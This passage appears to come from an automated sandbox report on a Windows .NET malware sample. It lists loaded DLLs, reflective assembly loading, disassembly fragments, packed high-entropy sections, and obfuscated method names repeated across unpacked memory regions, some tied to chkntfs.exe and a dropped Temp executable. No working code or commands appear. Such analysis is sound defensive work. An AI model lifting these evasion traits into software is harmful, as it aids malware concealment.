Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: 8hd98EhtIFcYkb8.exe, OptionsWindow.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.cs	.Net Code: gts9qQpZDK System.Reflection.Assembly.Load(byte[])
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.cs	.Net Code: gts9qQpZDK System.Reflection.Assembly.Load(byte[])
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.cs	.Net Code: gts9qQpZDK System.Reflection.Assembly.Load(byte[])
Source: 14.2.chkntfs.exe.4dccd08.2.raw.unpack, OptionsWindow.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 16.0.xQUrWfQeELsQZII.exe.341cd08.1.raw.unpack, OptionsWindow.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 16.2.xQUrWfQeELsQZII.exe.341cd08.1.raw.unpack, OptionsWindow.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 0_2_00DBBE50 push ebp; retn 5504h	0_2_00DBC03E
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 0_2_00DBB43B push ss; ret	0_2_00DBB442
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00405059 pushad ; iretd	3_2_00405071
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0041688F pushad ; retf	3_2_004168B1
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_004231F3 push edx; ret	3_2_00423232
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00401A04 push ecx; ret	3_2_00401A0E
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00416213 push esi; iretd	3_2_0041621E
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0040D2B8 push edx; iretd	3_2_0040D2BA
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00418B81 pushad ; iretd	3_2_00418BB3
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00418B92 pushad ; iretd	3_2_00418BB3
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00412435 push ds; iretd	3_2_00412439
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00414436 push edi; iretd	3_2_00414437
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00403570 push eax; ret	3_2_00403572
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0040CDC6 push es; retf	3_2_0040CDC7
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00418EFD push ecx; retf	3_2_00418F05
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_004086BC push ss; retf	3_2_004086CA
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0041A72F push esi; iretd	3_2_0041A737
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0041A733 push esi; iretd	3_2_0041A737
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00408787 push 0000004Fh; ret	3_2_004087AC
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0127225F pushad ; ret	3_2_012727F9
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012727FA pushad ; ret	3_2_012727F9
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012A09AD push ecx; mov dword ptr [esp], ecx	3_2_012A09B6
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0127283D push eax; iretd	3_2_01272858
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01271368 push eax; iretd	3_2_01271369
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047A27FA pushad ; ret	14_2_047A27F9
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047A225F pushad ; ret	14_2_047A27F9
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047A283D push eax; iretd	14_2_047A2858
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047D09AD push ecx; mov dword ptr [esp], ecx	14_2_047D09B6
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_005A2CA0 push esi; iretd	14_2_005A2CAB
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_005A0EC3 push edi; iretd	14_2_005A0EC4
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0059EEC2 push ds; iretd	14_2_0059EEC6

Source: 8hd98EhtIFcYkb8.exe	Static PE information: section name: .text entropy: 7.968066969388496
Source: EuOdzX7Ehz6t1H3[1].exe.14.dr	Static PE information: section name: .text entropy: 7.917870067906471
Source: aj34fjqh.exe.14.dr	Static PE information: section name: .text entropy: 7.917870067906471

Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, oM1ONZzUFLWJVwrBmD.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l8a5iVG0jC', 'Ypp5w0hSYu', 'BfJ5ZarlSI', 'jT65MBSGug', 'Eif5Qn0LMQ', 'tFR55tvRPs', 'HJm5InX1p7'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, gdM9Sh7KfRnAMumxqn.cs	High entropy of concatenated method names: 'sSMi1pLI71', 'fYSiOc6fub', 'bd0iTtYT6p', 'QR9i3ebDuL', 'Yktivvyc33', 'S6xineHxCQ', 'S2gid0gK8u', 'ueRi6OR8JL', 'UsiiauttIE', 'cQOiWyZ5ja'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, jQDDruxhUW3L8ewCVZ.cs	High entropy of concatenated method names: 'CBkkLfk7tw', 'CyCktpOby8', 'XgukcSRKdS', 'XofkeYkS0c', 'XSHkwODgIL', 'cflkZRmMqC', 'rMFRdgnPl3OqN2ybVI', 'XpHZ4UCqUu7hhT8K1s', 'PfFkkm37iB', 'r2xkGy6cJ9'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, lhJ65bFXQHOYZTcgeP.cs	High entropy of concatenated method names: 'ToString', 'N79ZWomGbk', 'x8UZ3LjLr1', 'sKHZsw8i6x', 'jqlZvR6Msv', 'FwSZntQ39f', 'tBtZXHq3EQ', 'jQMZdZ1ucS', 'H16Z6YSCi4', 'lrLZYVwTBb'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, G2EwvXm0pgP65nBy4N.cs	High entropy of concatenated method names: 'hrWLF0ToJi', 'eLBLKhNW5T', 'nDaLDZ0jYV', 'QrIDbRCQAE', 'W4tDztq0w0', 'CugLpHKKZr', 'lPcLk4foqQ', 'wJmL8NgLLW', 'CYHLGKSguj', 'DWFL90Y2iW'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.cs	High entropy of concatenated method names: 'Tn3G2DPEcv', 'JM1GFPB0WN', 'BgLGrdi7VU', 'GtQGKjYih4', 'yGjGHsx1Tk', 'J8NGDOgbbn', 'loPGLFPtEl', 'ymVGtNjNV9', 'CxRGRp2fju', 'CcFGcmtRi5'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, XlB6SnfKxWLPwwKgeG.cs	High entropy of concatenated method names: 'gZXQFa7yeL', 'jSpQrn36nI', 'jDfQK2kW5w', 'oKFQHvfEbs', 'dcnQDpwYVc', 'wvNQLy9IV2', 'fvgQtIXGKq', 'EXlQR9qvaY', 'FgcQcmSIpT', 'YcoQep6nBA'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, OrWCX5jtbYmS0dA9kT.cs	High entropy of concatenated method names: 'AWID2ka3UW', 'CdNDrBnXZV', 'cv6DH62672', 'cBZDLS4u2p', 'P6nDta9rly', 'eSpHmE7ynF', 'FX1HVSiMuy', 'zlqHuSpxEV', 'eg5HP1Hmrc', 'jmRHNZT1PQ'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, EcZcId4bZdkXGBs06MG.cs	High entropy of concatenated method names: 'OfQ57NDcOA', 'l0q5AFM4CV', 'qp65qRtygR', 'FlS5fJRjRH', 'kMi5Bf5tTE', 'bgD5hLULFO', 'TE45y03pAw', 'N4Y51ElEMZ', 'tUD5OHdLA8', 'WiP5oD8b0X'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, TBtgc3RMhuEWiOKVR4.cs	High entropy of concatenated method names: 'egswajbaVY', 'cI1wEpsEqf', 'qcZwJFrFUR', 'l1YwgmGbGs', 'Sodw34CUk5', 'bFCwsxrnQO', 'WF6wvUn4m1', 'vabwnQGZZg', 'GqLwXY8ZpD', 'ceDwdohG9Y'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, CewcDn534jkjemavqx.cs	High entropy of concatenated method names: 'J0JMP8YQfq', 'HEgMbUQjhV', 'y1nQpUJpyp', 'A4PQkS1uVG', 'LdwMWd7ICC', 'wNYMESTP6d', 'RyBMCGC67l', 'cgPMJKvxVT', 'loHMgDshgT', 'yg6M0EBnwL'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, G48YiXYv5ISrKQh5V0.cs	High entropy of concatenated method names: 'jJN5kaPtFu', 'UBM5GPIoC4', 'ODC59X6gti', 'TlI5FITjRb', 'uiE5rTvv02', 'sd75Hw6GaC', 'nVt5DHWvHh', 'n7kQuQ23NT', 'Jy3QPB6Xd9', 'uZ2QNGCgXA'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, TFHvvsv69ePy2X2akQ.cs	High entropy of concatenated method names: 'iJXL7lTqJ9', 'maILAdWG0a', 'IiXLq8WqvM', 'YbBLf77yHd', 'tkYLBX3Fif', 'gy3LhPP8QE', 'zVcLyJ9Yju', 'ubCL1soCsj', 'XYKLOkX7S1', 'cV6LoYePct'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, UDhf94o4ucAkwsm0sp.cs	High entropy of concatenated method names: 'f9Rq1yG0W', 'DJbff0drL', 'jEPhaTbqd', 'HujyEE1R5', 'BPrOP1NtM', 'morovODBF', 'UU6sQ30jGZyjNwuV8k', 'nEQFSL3NunNHbZ1dat', 'xSYQDvHlW', 'poTIxWtte'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, A297vOAUIe0qEnXTYd.cs	High entropy of concatenated method names: 'a9RrJNeYXU', 'K1Srg9mrKb', 'sf2r0xMadb', 'IQGrxa8AMT', 'pYyrmi7rBU', 'YvSrVfti0n', 'TrZrusOxQa', 'IAIrP1kaHt', 'hftrNMcGHt', 'wr9rbncfjd'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, EN7XnI15c37fuU7Hp5.cs	High entropy of concatenated method names: 'Y1hKfIOBtc', 'HjfKhcGKVf', 'LmoK1u0bTe', 'rngKOZldVQ', 'gbkKwfKbBL', 'rTHKZPaN6C', 'YRqKMiTl2T', 'CySKQT76gS', 'GoZK5G6d6Y', 'KWoKIRYuml'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, qLqlDin0qbgjcnfC3W.cs	High entropy of concatenated method names: 'TfsQTjjKJy', 'jrbQ3fEcoN', 'pZcQsKNQ2P', 'zt7QvEfapE', 'S9KQJNCHAY', 'A9QQnE9cdG', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, xKGw5U4U0dqk7yQy8K9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YM7IJqfRhK', 'WQPIgbFdNh', 'wTRI0DQ9Jn', 'WgqIxEvbOn', 'D8PImwMxwd', 'BmGIVGAro0', 'FiBIueQYcf'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, Wn4fI4CGsHeONDg1CJ.cs	High entropy of concatenated method names: 'X4IMcGj8cE', 'lDVMeNSyeu', 'ToString', 'O3jMFF67iv', 'mI5MrppEig', 'mllMKytvtK', 'ktmMHB14FW', 'uwdMDWoxtY', 'YhsMLGn6OQ', 'pd7MtIZZld'
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, n0j6khafNtyqP9fmV3.cs	High entropy of concatenated method names: 'Dispose', 'CK8kNrAsoW', 'u2r832ZQLk', 'LjPjjd69Fv', 'FRpkbSRatW', 'zSxkzCKGgd', 'ProcessDialogKey', 'ge08pewQR9', 'd8G8ksYKn8', 'HMo880mafZ'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, oM1ONZzUFLWJVwrBmD.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l8a5iVG0jC', 'Ypp5w0hSYu', 'BfJ5ZarlSI', 'jT65MBSGug', 'Eif5Qn0LMQ', 'tFR55tvRPs', 'HJm5InX1p7'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, gdM9Sh7KfRnAMumxqn.cs	High entropy of concatenated method names: 'sSMi1pLI71', 'fYSiOc6fub', 'bd0iTtYT6p', 'QR9i3ebDuL', 'Yktivvyc33', 'S6xineHxCQ', 'S2gid0gK8u', 'ueRi6OR8JL', 'UsiiauttIE', 'cQOiWyZ5ja'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, jQDDruxhUW3L8ewCVZ.cs	High entropy of concatenated method names: 'CBkkLfk7tw', 'CyCktpOby8', 'XgukcSRKdS', 'XofkeYkS0c', 'XSHkwODgIL', 'cflkZRmMqC', 'rMFRdgnPl3OqN2ybVI', 'XpHZ4UCqUu7hhT8K1s', 'PfFkkm37iB', 'r2xkGy6cJ9'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, lhJ65bFXQHOYZTcgeP.cs	High entropy of concatenated method names: 'ToString', 'N79ZWomGbk', 'x8UZ3LjLr1', 'sKHZsw8i6x', 'jqlZvR6Msv', 'FwSZntQ39f', 'tBtZXHq3EQ', 'jQMZdZ1ucS', 'H16Z6YSCi4', 'lrLZYVwTBb'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, G2EwvXm0pgP65nBy4N.cs	High entropy of concatenated method names: 'hrWLF0ToJi', 'eLBLKhNW5T', 'nDaLDZ0jYV', 'QrIDbRCQAE', 'W4tDztq0w0', 'CugLpHKKZr', 'lPcLk4foqQ', 'wJmL8NgLLW', 'CYHLGKSguj', 'DWFL90Y2iW'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.cs	High entropy of concatenated method names: 'Tn3G2DPEcv', 'JM1GFPB0WN', 'BgLGrdi7VU', 'GtQGKjYih4', 'yGjGHsx1Tk', 'J8NGDOgbbn', 'loPGLFPtEl', 'ymVGtNjNV9', 'CxRGRp2fju', 'CcFGcmtRi5'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, XlB6SnfKxWLPwwKgeG.cs	High entropy of concatenated method names: 'gZXQFa7yeL', 'jSpQrn36nI', 'jDfQK2kW5w', 'oKFQHvfEbs', 'dcnQDpwYVc', 'wvNQLy9IV2', 'fvgQtIXGKq', 'EXlQR9qvaY', 'FgcQcmSIpT', 'YcoQep6nBA'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, OrWCX5jtbYmS0dA9kT.cs	High entropy of concatenated method names: 'AWID2ka3UW', 'CdNDrBnXZV', 'cv6DH62672', 'cBZDLS4u2p', 'P6nDta9rly', 'eSpHmE7ynF', 'FX1HVSiMuy', 'zlqHuSpxEV', 'eg5HP1Hmrc', 'jmRHNZT1PQ'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, EcZcId4bZdkXGBs06MG.cs	High entropy of concatenated method names: 'OfQ57NDcOA', 'l0q5AFM4CV', 'qp65qRtygR', 'FlS5fJRjRH', 'kMi5Bf5tTE', 'bgD5hLULFO', 'TE45y03pAw', 'N4Y51ElEMZ', 'tUD5OHdLA8', 'WiP5oD8b0X'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, TBtgc3RMhuEWiOKVR4.cs	High entropy of concatenated method names: 'egswajbaVY', 'cI1wEpsEqf', 'qcZwJFrFUR', 'l1YwgmGbGs', 'Sodw34CUk5', 'bFCwsxrnQO', 'WF6wvUn4m1', 'vabwnQGZZg', 'GqLwXY8ZpD', 'ceDwdohG9Y'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, CewcDn534jkjemavqx.cs	High entropy of concatenated method names: 'J0JMP8YQfq', 'HEgMbUQjhV', 'y1nQpUJpyp', 'A4PQkS1uVG', 'LdwMWd7ICC', 'wNYMESTP6d', 'RyBMCGC67l', 'cgPMJKvxVT', 'loHMgDshgT', 'yg6M0EBnwL'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, G48YiXYv5ISrKQh5V0.cs	High entropy of concatenated method names: 'jJN5kaPtFu', 'UBM5GPIoC4', 'ODC59X6gti', 'TlI5FITjRb', 'uiE5rTvv02', 'sd75Hw6GaC', 'nVt5DHWvHh', 'n7kQuQ23NT', 'Jy3QPB6Xd9', 'uZ2QNGCgXA'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, TFHvvsv69ePy2X2akQ.cs	High entropy of concatenated method names: 'iJXL7lTqJ9', 'maILAdWG0a', 'IiXLq8WqvM', 'YbBLf77yHd', 'tkYLBX3Fif', 'gy3LhPP8QE', 'zVcLyJ9Yju', 'ubCL1soCsj', 'XYKLOkX7S1', 'cV6LoYePct'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, UDhf94o4ucAkwsm0sp.cs	High entropy of concatenated method names: 'f9Rq1yG0W', 'DJbff0drL', 'jEPhaTbqd', 'HujyEE1R5', 'BPrOP1NtM', 'morovODBF', 'UU6sQ30jGZyjNwuV8k', 'nEQFSL3NunNHbZ1dat', 'xSYQDvHlW', 'poTIxWtte'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, A297vOAUIe0qEnXTYd.cs	High entropy of concatenated method names: 'a9RrJNeYXU', 'K1Srg9mrKb', 'sf2r0xMadb', 'IQGrxa8AMT', 'pYyrmi7rBU', 'YvSrVfti0n', 'TrZrusOxQa', 'IAIrP1kaHt', 'hftrNMcGHt', 'wr9rbncfjd'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, EN7XnI15c37fuU7Hp5.cs	High entropy of concatenated method names: 'Y1hKfIOBtc', 'HjfKhcGKVf', 'LmoK1u0bTe', 'rngKOZldVQ', 'gbkKwfKbBL', 'rTHKZPaN6C', 'YRqKMiTl2T', 'CySKQT76gS', 'GoZK5G6d6Y', 'KWoKIRYuml'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, qLqlDin0qbgjcnfC3W.cs	High entropy of concatenated method names: 'TfsQTjjKJy', 'jrbQ3fEcoN', 'pZcQsKNQ2P', 'zt7QvEfapE', 'S9KQJNCHAY', 'A9QQnE9cdG', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, xKGw5U4U0dqk7yQy8K9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YM7IJqfRhK', 'WQPIgbFdNh', 'wTRI0DQ9Jn', 'WgqIxEvbOn', 'D8PImwMxwd', 'BmGIVGAro0', 'FiBIueQYcf'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, Wn4fI4CGsHeONDg1CJ.cs	High entropy of concatenated method names: 'X4IMcGj8cE', 'lDVMeNSyeu', 'ToString', 'O3jMFF67iv', 'mI5MrppEig', 'mllMKytvtK', 'ktmMHB14FW', 'uwdMDWoxtY', 'YhsMLGn6OQ', 'pd7MtIZZld'
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, n0j6khafNtyqP9fmV3.cs	High entropy of concatenated method names: 'Dispose', 'CK8kNrAsoW', 'u2r832ZQLk', 'LjPjjd69Fv', 'FRpkbSRatW', 'zSxkzCKGgd', 'ProcessDialogKey', 'ge08pewQR9', 'd8G8ksYKn8', 'HMo880mafZ'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, oM1ONZzUFLWJVwrBmD.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l8a5iVG0jC', 'Ypp5w0hSYu', 'BfJ5ZarlSI', 'jT65MBSGug', 'Eif5Qn0LMQ', 'tFR55tvRPs', 'HJm5InX1p7'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, gdM9Sh7KfRnAMumxqn.cs	High entropy of concatenated method names: 'sSMi1pLI71', 'fYSiOc6fub', 'bd0iTtYT6p', 'QR9i3ebDuL', 'Yktivvyc33', 'S6xineHxCQ', 'S2gid0gK8u', 'ueRi6OR8JL', 'UsiiauttIE', 'cQOiWyZ5ja'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, jQDDruxhUW3L8ewCVZ.cs	High entropy of concatenated method names: 'CBkkLfk7tw', 'CyCktpOby8', 'XgukcSRKdS', 'XofkeYkS0c', 'XSHkwODgIL', 'cflkZRmMqC', 'rMFRdgnPl3OqN2ybVI', 'XpHZ4UCqUu7hhT8K1s', 'PfFkkm37iB', 'r2xkGy6cJ9'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, lhJ65bFXQHOYZTcgeP.cs	High entropy of concatenated method names: 'ToString', 'N79ZWomGbk', 'x8UZ3LjLr1', 'sKHZsw8i6x', 'jqlZvR6Msv', 'FwSZntQ39f', 'tBtZXHq3EQ', 'jQMZdZ1ucS', 'H16Z6YSCi4', 'lrLZYVwTBb'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, G2EwvXm0pgP65nBy4N.cs	High entropy of concatenated method names: 'hrWLF0ToJi', 'eLBLKhNW5T', 'nDaLDZ0jYV', 'QrIDbRCQAE', 'W4tDztq0w0', 'CugLpHKKZr', 'lPcLk4foqQ', 'wJmL8NgLLW', 'CYHLGKSguj', 'DWFL90Y2iW'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.cs	High entropy of concatenated method names: 'Tn3G2DPEcv', 'JM1GFPB0WN', 'BgLGrdi7VU', 'GtQGKjYih4', 'yGjGHsx1Tk', 'J8NGDOgbbn', 'loPGLFPtEl', 'ymVGtNjNV9', 'CxRGRp2fju', 'CcFGcmtRi5'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, XlB6SnfKxWLPwwKgeG.cs	High entropy of concatenated method names: 'gZXQFa7yeL', 'jSpQrn36nI', 'jDfQK2kW5w', 'oKFQHvfEbs', 'dcnQDpwYVc', 'wvNQLy9IV2', 'fvgQtIXGKq', 'EXlQR9qvaY', 'FgcQcmSIpT', 'YcoQep6nBA'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, OrWCX5jtbYmS0dA9kT.cs	High entropy of concatenated method names: 'AWID2ka3UW', 'CdNDrBnXZV', 'cv6DH62672', 'cBZDLS4u2p', 'P6nDta9rly', 'eSpHmE7ynF', 'FX1HVSiMuy', 'zlqHuSpxEV', 'eg5HP1Hmrc', 'jmRHNZT1PQ'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, EcZcId4bZdkXGBs06MG.cs	High entropy of concatenated method names: 'OfQ57NDcOA', 'l0q5AFM4CV', 'qp65qRtygR', 'FlS5fJRjRH', 'kMi5Bf5tTE', 'bgD5hLULFO', 'TE45y03pAw', 'N4Y51ElEMZ', 'tUD5OHdLA8', 'WiP5oD8b0X'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, TBtgc3RMhuEWiOKVR4.cs	High entropy of concatenated method names: 'egswajbaVY', 'cI1wEpsEqf', 'qcZwJFrFUR', 'l1YwgmGbGs', 'Sodw34CUk5', 'bFCwsxrnQO', 'WF6wvUn4m1', 'vabwnQGZZg', 'GqLwXY8ZpD', 'ceDwdohG9Y'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, CewcDn534jkjemavqx.cs	High entropy of concatenated method names: 'J0JMP8YQfq', 'HEgMbUQjhV', 'y1nQpUJpyp', 'A4PQkS1uVG', 'LdwMWd7ICC', 'wNYMESTP6d', 'RyBMCGC67l', 'cgPMJKvxVT', 'loHMgDshgT', 'yg6M0EBnwL'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, G48YiXYv5ISrKQh5V0.cs	High entropy of concatenated method names: 'jJN5kaPtFu', 'UBM5GPIoC4', 'ODC59X6gti', 'TlI5FITjRb', 'uiE5rTvv02', 'sd75Hw6GaC', 'nVt5DHWvHh', 'n7kQuQ23NT', 'Jy3QPB6Xd9', 'uZ2QNGCgXA'
